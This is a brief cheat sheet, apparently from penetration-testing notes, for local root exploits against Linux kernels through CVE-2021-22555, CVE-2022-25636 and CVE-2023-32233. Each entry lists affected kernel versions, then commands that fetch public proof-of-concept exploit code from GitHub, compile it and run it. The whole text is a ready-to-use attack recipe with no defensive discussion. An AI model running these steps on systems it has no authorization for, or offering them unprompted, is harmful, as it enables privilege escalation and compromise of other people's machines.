CVE-2021-22555#
Affected versions: 2.6 - 5.11
uname -rwget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
gcc -m32 -static exploit.c -o exploit
./exploitCVE-2022-25636#
Affected versions: 5.4 to 5.6.10
git clone https://github.com/Bonfee/CVE-2022-25636.git
cd CVE-2022-25636
make
./exploitCVE-2023-32233#
Affected version: up to 6.3.1
git clone https://github.com/Liuk3r/CVE-2023-32233
cd CVE-2023-32233
gcc -Wall -o exploit exploit.c -lmnl -lnftnl
./exploit